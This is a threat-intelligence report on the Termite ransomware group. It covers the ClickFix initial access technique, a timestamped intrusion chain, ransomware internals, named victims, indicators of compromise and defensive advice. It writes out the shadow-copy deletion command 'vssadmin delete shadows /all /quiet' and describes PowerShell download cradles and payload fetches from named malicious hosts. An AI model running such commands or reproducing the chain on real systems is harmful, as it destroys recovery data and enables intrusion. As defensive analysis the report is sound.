1. Executive Summary
Termite is a highly sophisticated ransomware operation first observed in November 2024. Built on the leaked Babuk ransomware source code, Termite has evolved rapidly from opportunistic CVE exploitation into a mature, multi-stage threat employing social engineering, purpose-built remote access tooling, and double extortion. As of March 2026, the group has claimed at least 35 known victims across healthcare, government, logistics, chemicals, and financial services spanning North America, Europe, and Australia.
The group’s most significant recent development is the adoption of ClickFix — a browser-based social engineering technique that bypasses traditional email phishing defenses entirely, making Termite one of the first ransomware operations to operationalize this attack class at scale.
2. Origins & Attribution
2.1 Codebase Lineage
Termite is assessed to be a derivative of Babuk ransomware, a strain whose full source code was publicly leaked in 2021. The inheritance is evident across encryption logic, service-termination lists, and core system interaction patterns. A definitive forensic artifact confirms the lineage — every file encrypted by Termite carries the following signature string appended at its end:
"choung dong looks like hot dog"
This string, inherited directly from the Babuk codebase, serves as a reliable indicator of compromise during forensic triage. Despite the shared lineage, Termite distinguishes itself through a more sophisticated multi-stage intrusion methodology and the integration of bespoke tooling absent from the original Babuk codebase.
2.2 Threat Actor: Velvet Tempest (DEV-0504)
Recent campaigns have been attributed to a threat actor tracked as Velvet Tempest, also designated DEV-0504 by Microsoft. This group is a long-standing ransomware affiliate with documented prior associations with Ryuk, REvil, Conti, BlackCat/ALPHV, and LockBit. Their migration to the Termite payload represents a continuation of their ransomware-as-a-service affiliate model, with the group bringing years of operational tradecraft to bear on behalf of Termite operators.
3. Initial Access Vectors — A Three-Phase Evolution
Termite has demonstrated a significant and deliberate evolution in initial access methodology, shifting from passive vulnerability exploitation toward sophisticated human-centric attacks.
Phase 1: CVE Exploitation (November–December 2024)
The group’s earliest documented campaigns exploited critical vulnerabilities in Cleo MFT (Managed File Transfer) software — a platform used by over 4,200 businesses globally, including major brands like New Balance, Barilla America, and TaylorMade.
The two key CVEs exploited were CVE-2024-50623 and CVE-2024-55956, both unauthenticated remote code execution flaws affecting Cleo Harmony, VLTrader, and LexiCom. Cleo issued a patch in October 2024, but researchers subsequently discovered that even fully updated systems running version 5.8.0.21 remained exploitable — the patch could be bypassed, dramatically widening the victim pool. Attacks began on December 3, 2024, with Huntress Labs confirming at least 10 victims across consumer products, trucking, shipping, and food services within days.
Phase 2: Credential Theft (January–February 2025)
Campaigns in early 2025 pivoted toward credential harvesting as a ransomware precursor. Kroll investigators documented a watering hole attack using malicious advertising software to deliver RedLine Stealer — a commercial credential harvester — to targeted users. The harvested credentials were subsequently used to gain access to and deploy Termite directly within VMware ESXi environments, a platform often lacking traditional endpoint agent coverage.
Phase 3: ClickFix Social Engineering (Mid-2025 to Present)
The most operationally significant development in Termite’s history is the adoption of the ClickFix technique. Unlike phishing emails or software exploits, ClickFix attacks succeed through direct user interaction, making them substantially harder to block with technical controls alone.
How ClickFix works: Victims land on compromised websites displaying fake browser error notifications — typically mimicking a “Chrome update failed” message or a CAPTCHA verification screen. The page instructs the user to copy a displayed command and execute it by pressing Win+R (Windows Run dialog) and pasting it in. This single action — appearing harmless to an untrained user — executes a malicious PowerShell command that initiates the full attack chain. No email attachment, no exploit, no vulnerability required.
4. Detailed Intrusion Anatomy
The following reconstructs a documented February 2026 intrusion observed by MalBeacon researchers against a replica environment of a US non-profit organization with over 3,000 endpoints. It represents the clearest published window into Termite’s current operational tempo.
17:38:57 — ClickFix execution triggered via Windows Run dialog, downloading initial payload through finger.h3securecloud[.]com using the finger.exe utility (LOLBIN abuse, TCP/79).
17:39:14 — Archive extracted using the native tar.exe binary — no third-party tools introduced, reducing forensic footprint.
17:40:23 — Outbound request to ip-api[.]com to geolocate the compromised host and profile the target environment before proceeding.
17:40:30 — CastleRAT establishes its first C2 beacon to nachalonachalo[.]com, giving operators remote access to the environment.
17:45:03 — DonutLoader retrieved via a PowerShell IEX (Invoke-Expression) cradle from vrstudio[.]life — a fileless staging technique leaving no loader binary on disk.
17:45:25 — A .NET payload compiled on the host itself via csc.exe (the Microsoft C# compiler), evading signature-based detection of pre-compiled binaries.
17:59:45 — Active Directory enumeration begins via encoded PowerShell — mapping the domain, identifying privileged accounts, and locating high-value targets before the ransomware payload is ever deployed.
The Termite ransomware payload was not deployed within the 12-day observation window, but the sequence is textbook pre-ransomware staging behavior. The gap between intrusion and encryption is consistent with the group’s documented pattern of extended dwell time and thorough pre-encryption reconnaissance.
CastleRAT & Dead-Drop C2
CastleRAT is a purpose-built remote access tool deployed by Velvet Tempest operators. Its C2 infrastructure employs a notable evasion technique: legitimate Steam Community profile pages are used as dead-drop resolvers. Malicious C2 server addresses are encoded within Steam profile fields, and CastleRAT retrieves the real C2 address by reading these pages on startup. Since Steam is a trusted consumer platform rarely blocked at enterprise network perimeters, this technique allows C2 traffic to blend into normal web activity.
Full Malware Arsenal
Through ClickFix campaigns, Termite-affiliated operators deploy a broad malware ecosystem across their intrusions, creating multiple independent pathways for persistent access:
Stealers: LummaStealer (primary), RedLine Stealer — used to harvest credentials and browser session cookies before encryption.
RATs & Backdoors: CastleRAT, AsyncRAT, Xworm, NetSupport, SectopRAT — providing persistent remote access and command execution throughout the dwell period.
Loaders: DonutLoader, Latrodectus, MintsLoader — used to stage and deploy subsequent payloads while minimizing on-disk artifacts.
Ransomware: Termite payload — the final stage, deployed only after reconnaissance and exfiltration are complete.
5. Technical Ransomware Analysis
5.1 Pre-Encryption Behavior
Process Priority Manipulation: Upon execution, the ransomware calls SetProcessShutdownParameters(0, 0), ensuring its process is among the last to be terminated during any system shutdown — maximizing the encryption window if a user or administrator attempts an emergency reboot.
Mutex Check: Before beginning local drive encryption, Termite checks for the existence of a hardcoded mutex: "DoYouWantToHaveSexWithCuongDong". If not found, the ransomware proceeds to recursively traverse all local drives. The mutex prevents multiple simultaneous executions of the ransomware on the same host.
System Fingerprinting: The ransomware retrieves the system’s GUID and enumerates running services and processes via Windows API calls, building a profile of the environment to guide subsequent actions.
5.2 Defense Evasion
Volume Shadow Copy Deletion (T1490): The first major action Termite takes is the elimination of all Windows Volume Shadow Copies — the built-in recovery mechanism most organizations rely on for fast restoration:
vssadmin.exe delete shadows /all /quiet
Security Service Termination (T1489): Using ControlService() with SERVICE_CONTROL_STOP, Termite disables a comprehensive list of security and backup services before encrypting. Targeted categories include virtualization services (HvHost, vmcompute, vmms), backup solutions (all Veeam services, all BackupExec agents and engines, Acronis), security products (Sophos, DefWatch, ccEvtMgr, RTVscan), database services (sql, mepocs), and cloud backup agents (YooBackup, YooIT, CAARCUpdateSvc).
Process Termination (T1562.001): Termite terminates processes that may hold file locks preventing encryption. This includes database engines (sqlservr.exe, oracle.exe, dbeng50.exe), the full Microsoft Office suite (excel.exe, winword.exe, outlook.exe, powerpnt.exe, onenote.exe, visio.exe), email clients (thunderbird.exe, thebat.exe), and virtualization processes (vmmem.exe, vmwp.exe).
5.3 Encryption Engine (T1486)
Termite’s encryption engine supports runtime parameters for targeted or scoped execution: --onefile to encrypt a specific file, --shares to target a named network share, --paths to target a specific remote drive, and --debug to generate diagnostic logs.
Network Share Enumeration: Termite uses WNetOpenEnum() and WNetEnumResourcesW() to discover and enumerate all accessible network shares and mapped drives visible to the compromised host. It specifically targets the ADMIN$ hidden administrative share — Windows’ remote management share pointing to the system directory — to maximize spread. When the --shares argument is passed, NetShareEnum() is invoked to locate the $ADMIN share and begin recursive encryption.
Remote Drive Targeting: GetDriveTypeW() is called against each discovered drive path. Drives identified as remote (SMB/NFS shares, mapped network drives) are fully enumerated and queued for encryption, allowing a single Termite execution to spread the encryption process across the entire connected network.
Local Drive Mounting: For protected or difficult-to-access local volumes, Termite employs SetVolumeMountPoint() to mount them to accessible paths before encrypting, ensuring no local storage escapes the sweep.
5.4 Post-Encryption Artifacts
After encryption completes, each affected file carries the .termite extension. A ransom note titled "How To Restore Your Files.txt" is dropped in every encrypted directory, directing victims to a Tor-based onion portal with a unique victim support token. The forensic signature "choung dong looks like hot dog" is appended to the binary tail of every encrypted file.
6. Double Extortion
Termite consistently combines file encryption with prior data exfiltration, creating a two-vector pressure campaign. Victims with robust backups still face the threat of sensitive data being published on Termite’s public leak site. The staged model proceeds as follows: data is exfiltrated silently during the dwell period; files are then encrypted causing operational disruption; the victim is directed to the Tor portal with a ransom demand; if unpaid, the stolen data is published publicly — creating regulatory, legal, and reputational consequences entirely independent of whether the victim can restore from backup.
7. Notable Confirmed Incidents
Blue Yonder (November 2024): Blue Yonder, a supply chain software vendor serving over 3,000 global enterprises, was breached in November 2024. The attack disrupted downstream services for dozens of customers and resulted in approximately 680 GB of data being exfiltrated — a textbook supply chain multiplier attack.
Cleo MFT Customers (December 2024): Beginning December 3, 2024, at least 10 organizations across consumer products, trucking, shipping, and food services were breached via the Cleo CVEs. The impact was compounded by the failed patch, which left even updated deployments exploitable.
Genea — Australian IVF Clinic (February 2025): One of Australia’s leading fertility services providers suffered a devastating breach resulting in approximately 940 GB of highly sensitive patient data being exfiltrated — including medical histories, fertility treatment records, and contact information. The nature of the data significantly amplified patient harm beyond the operational disruption.
Zschimmer & Schwarz (January 2025): The specialty chemicals manufacturer, producing high-performance chemical auxiliaries for global textile, leather, and metalworking industries, was confirmed as a Termite victim in January 2025.
Insight Hospital & Medical Center, Chicago (September 2025): The breach was estimated to have occurred in September 2025 but only surfaced publicly in February 2026 — suggesting a dwell time of approximately five months before detection or disclosure.
US Federal Contractors & Healthcare (2025–2026): ClickFix-linked Termite campaigns specifically targeted US healthcare and government-adjacent organizations, with confirmed victims including a children’s hospital in North Carolina, Illinois-based DoD and Department of Energy contractors, and a Maryland federal accounting firm.
As of March 2026, ransomware tracking services record 35+ confirmed victims on Termite’s active leak site.
8. Indicators of Compromise
File System:
- Extension
.termiteon all encrypted files - Ransom note:
How To Restore Your Files.txtin every encrypted directory - Binary signature
"choung dong looks like hot dog"appended to encrypted files - Mutex:
DoYouWantToHaveSexWithCuongDong
Network:
finger.h3securecloud[.]com— ClickFix initial payload downloadnachalonachalo[.]com— CastleRAT C2 servervrstudio[.]life— DonutLoader PowerShell IEX staging hostip-api[.]com— environment geolocation profiling (legitimate service, abused)- Outbound TCP/79 (finger protocol) from workstations
- Requests to steamcommunity.com profile pages from non-gaming contexts
Behavioral:
- Windows Run dialog spawning PowerShell or cmd.exe
finger.exemaking outbound TCP/79 connectionscsc.exeinvoked from user temp directories- PowerShell using IEX + DownloadData or DownloadString
vssadmin.exeexecuting delete shadows- Chrome credential store accessed by non-browser processes
WNetOpenEnum/WNetEnumResourcesWcalled from non-admin processes
9. Defensive Recommendations
Patch and verify: Apply Cleo MFT patches and confirm efficacy through authenticated scanning — version number alone is insufficient given the bypass discovered in the October 2024 patch.
Alert on VSS deletion: vssadmin delete shadows from any process is a near-universal ransomware precursor with virtually no legitimate use at scale. This should trigger an immediate high-severity alert.
Block or monitor TCP/79 (finger): Outbound finger protocol connections from workstations are extremely rare legitimately and were the initial ClickFix staging mechanism in the documented February 2026 intrusion.
Hunt for user-pasted PowerShell execution: PowerShell launched from the Windows Run dialog or Explorer is strongly correlated with ClickFix. Alert on PowerShell parents other than typical enterprise deployment tools.
Flag on-host .NET compilation: csc.exe invoked from user temp directories outside development machines indicates staged loader framework activity consistent with DonutLoader deployment.
Protect backup infrastructure: Maintain offline, immutable backups. Termite explicitly enumerates and kills Veeam, BackupExec, and Acronis services before encrypting — online backups are not sufficient.
Restrict ADMIN$ shares: Disable unnecessary administrative shares on endpoints and restrict access to explicitly authorized management systems only.
Deploy EDR on ESXi: Termite has been deployed directly within VMware ESXi environments, where most traditional endpoint agents are absent.
Monitor Steam from enterprise networks: CastleRAT uses Steam Community profile pages as C2 dead-drop resolvers — Steam traffic from corporate workstations outside gaming companies warrants inspection.
User awareness targeting ClickFix specifically: Train users that no legitimate browser, website, or IT process will ever instruct them to open the Run dialog and paste a command. This specific pattern is the single most actionable user-facing indicator of a ClickFix attack.
10. Conclusion
Termite represents a meaningful maturation of the ransomware threat landscape. In under 18 months, the group has evolved from opportunistic CVE exploitation into a sophisticated multi-stage operation with purpose-built malware, advanced operational security, and strategic targeting of high-value sectors. The shift to ClickFix social engineering is the most significant development: it removes the vulnerability dependency from initial access entirely, making patching alone an insufficient defense.
With 35+ confirmed victims, active campaigns ongoing, a proven affiliate infrastructure, and a continuously expanding malware arsenal, Termite should be treated as a persistent and escalating threat requiring sustained defensive attention across patch management, endpoint detection, backup integrity, and security awareness programs.
